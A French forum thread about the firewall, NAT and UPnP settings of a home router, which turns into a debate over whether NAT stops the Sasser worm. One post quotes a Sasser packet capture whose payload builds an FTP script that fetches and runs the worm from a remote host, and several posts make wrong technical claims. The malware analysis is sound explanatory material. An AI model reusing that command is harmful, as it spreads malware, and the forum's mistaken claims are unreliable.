Bonjour    
 
Je découvre ce routeur avec ma Freebox (en dégroupage), et j'aimerais savoir si le mode firewall integré au routeur à un interet quand on sais qu'il fait de la translation d'adresse (NAT) ?    
Je pense que cela protége largement des pb du type sasser et compagnie ?    
 
J'ai aussi une question sur le mode "Advanced Routing" qui se trouve dans "Setup", il y a deux possibilités : "Gateway" ou "Routeur", je comprends pas très bien l'interet ??
 
Je cherche des sites qui explique comment parametrer ce routeur correctement, j'avoue que la documentation est relativement succincte alors si vous avez de beau link vers un beau tutorials sur cette appareil, je suis preneur.    
 
Merci à tous.

du fait du nat, tu est naturellement protégé des attaques venant du net.

Personne n'a d'idée ?
 
Je rajoute dans mes question l'UpnP... cette option est ce bien utile ou est ce que cela pourrai etre dangereux de s'en servir... bcp deconseille de l'activé sous XP ! alors sur mon routeur ?
 
 

bah si tu en as le besoin tu l'active, si tu en a pas le besoin tu ne l'active pas

Dans 2s il demande s'il en a besoin ou pas
En fait si t'utilises pas les fonctions avancées de msn ( le seul logiciel qui a ma connaissance utilise Upnp) t'as pas besoin de l'Upnp

Merci Joeman79
Les réponses non constructive peuvent etre garder pour soi meme "com21"

Salut  
 
UpnP : particulièrement affectionné par petits nouveaux : Bobax et Kibuv.
Le port 5000 en prend plein la g...
 
A+

 
j'ai ce routeur, il m'est arrivé un truc curieux hier:
 
javais installé un XP tout neuf sur un pc refait, j'installe la carte WIFI. Je voulais ajouter un firewall soft, mais après.
 
Bref, je vais faire un tour sur le net, ma fille va sur un site pour tester un jeu en ligne. et PAF : mon pc se met à rebooter, 1 fois , 2 fois.... ça sentait le sasser, malgré mon antivirus ajour du matin (Mc afee) j'ai passé le patch petitmou, ça a disparu.
 
Je précise que la fonction firewall du WRT 54g est activé.
 
donc une question : par où c'est venu ?? est ce que sasser (ou ds le même genre)  peut se propager par un cd sur lequel j'avais mon "XP"?
 
est ce par l'utilisation des ports standards de P2P , genre 4662, 4672...?
 
Je pensai être secure derrière le routeur et avoir mis ZA pour rien!
 
ça fait drôle!

tu aurais pas une dmz par hazard ?

 
c'est bien sasser
 
 

 
sasser à rien    car sasser se propage par le net donc le port 80, donc pas bloqué par le firewall sinon plus d'Internet    
 

cd rien a voir, par ou c'est venu voir la réponse ci dessus
 
 

 ben la c'est 70% de chance d'etre vérolé
 
 
 

un firewall sasser à rien si XP n'est pas patché, microsoft à sortie le patch correctif depuis des mois pour sasser, avant même que le virus soit sortie
 
Alors on update son windows chérie, sinon le patch ben sasser à rien non plus car sasser va revenir étant donner que la faille existe toujours sur ton poste    
 
A+

Sur ce genre d'appareils, la translation nat bloque par principe toutes les connexions entrantes, y compris le port 80 !
Je ne sais pas vraiment a quoi sert un firewall la dessus!
Toujours est il qu'un firewall est utile contre sasser, de la meme maniere que contre blaster ..

 
donc si on fait du NAT on chope pas sasser  

Un routeur qui ne fait pas de la redirection de port a la sauvage (genre tous les ports de 20 à 1024) ne permettra pas a   sasser de passer, ni a blaster non plus

 
oui mais bon nombres d'entreprises on chopé sasser, et comme tout routeur ils font du NAT, alors y a un truc que je pige pas.
 
tu te connectes sur un serveur web via son 80, le port de ton poste en sortie est 1922 (pour en ce moment) par exemple, sasser se trouve sur la page du web, tu cliques, tu charges bien même si ton adresse est 192.168.1.2 bref tu reçois bien la page
 
qu'est ce qui colle pas dans ma demo?

 
petit exemple :
cette entreprise a des commerciaux, eux ont des portables.
Le weekend le portable est à la maison, le fistion bricole dessus et choppe n'importe quoi.
Le lundi à 11h le commercial arrive et branche le portable sur le réseaux...
 
BOUMMMMMMM  .....
 
 

 
bon dans ce cas OK, quoique cela reste la version journalistique, mais moi je me demande en quoi le NAT peu empecher sasser

sasser est un virus qui passe de pc en pc directement (avec l'adresse ip)
 
derrière un routeur NAT on est en ip privé. donc, depuis l'extérieur il n'est pas possible de contacter un pc précis qui se situe derriere le nat. (et non sasser ne se met pas sur un site web)

 
euh autant pour moi pour le site web (barbarisation du langage)
 
ce que je n'arrive pas à comprendre dans tes explications c'est comment sasser peu ne pas se propager sur le net grace au NAT. Au faite Delta airline et l'AFP pour la France font bien du NAT sur leur FW et les routeurs pourtant sasser à sévit et concernant Delta ce n'etait pas les employés arrivé le lundi qui ont foutu le bordel, mais bien dés le samedi a tel point que les vol de Delta airline ont été annulé ou en retard de 6 heures le dimanche. (dimanche pour l'AFP)
 
toutes les entreprises sont équipés d'un routeur, tous les hébergeurs sont équipés d'un FW, beaucoup de particuliers sont équipés aussi d'un routeur, tous ces appareils font du NAT et malgrés cela sasser continu de circuler, y a vraiment quelque chose qui m'echappe.
 
Voici une capture d'une partie de sasser (inofensif c'est pourquoi je me permet)
 
 (Merci au SANS Institue et au Certa)
 
 
[quote]-----
05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF ***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20 63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope 6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n 24.97.219.185 35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec 68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm 64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user& 65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft 70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917 5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp 26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f 74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp - 73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_ 75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off& 64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo 20 6F 6E 0A on.  
---------------------------------------------------------------------------------------------------------------------
[quote]    
 
 Pour se propager, Sasser balaye des adresses IP aléatoires, et lorsqu'un système vulnérable est identifié, le ver envoie un paquet spécifique vers le port 445.  
Nat ou pas si le port 445 est open ça passe    
 
 
Une fois le débordement exploité, un shell est ouvert sur le port 9996/TCP, ce qui permettra l'exécution de commandes distantes. Un deuxième port (5554/TCP) est ouvert sur les machines infectées, il sera utilisé comme pseudo-serveur ftp avec connexion anonyme, afin de communiquer avec d'autres systèmes infectés.
Sasser crée ensuite le script CMD.FTP contenant un certain nombre d'instructions dont le but est de récupérer puis exécuter une copie du ver via le pseudo-FTP bien sur.
 
tout cela NAT ou pas sa passe, seul le blocage de port peu empecher sasser de se propager ou bien sur le patch correctif, car je le rappel sasser vérifie si la faille existe.
 
mais je maitrise pas toutes les subtilitées du NAT, alors y a pêut être une explication logique
 
va falloir que je    
 
A+

bah si il relaye le port 445 vers une machine protégé c'est leur problème.
 
Mais je répète, par défaut avec un nat et dans le cas ou le port 445 n'a pas été relayé vers une machine non patché : ce n'est pas possible !

 
tu voulais dire "non" protegé la. mais je suis pas convaincu que des compagnies aériennes laissent une telle ouverture sur leur réseau.  
 
 

 
OK, c'est interressant, va falloir que j'étudie un peu plus le NAT y a peut être des choses a faire pour mieux se proteger.
Pour moi ce n'est un service basique qui a pour effet de cacher le LAN
cale a son importance mais a mon esprit ca restait basique.
 
A+

derriere le NAT, le lan est en ip privé (non rootable sur internet)  donc si tu ne fait aucune redirection  il est impossible d'atteindre un pc derriere un nat

 
Jai bien tout lu et ça m'amène plusieurs  questions :  
 
1) derrière le routeur DOIT ON rester en IP privé non routable ?
2) une adresse non routable est elle plus secure qu'une adresse routable (même de barbares, c'est ce que j'ai fait...) ?
 

derriere un routeur NAT  tu est forcément en ip privé.
si tu est en ip publique c'est un routeur (non nat)
 
une adresse non routable est plus secure qu'une adresse routable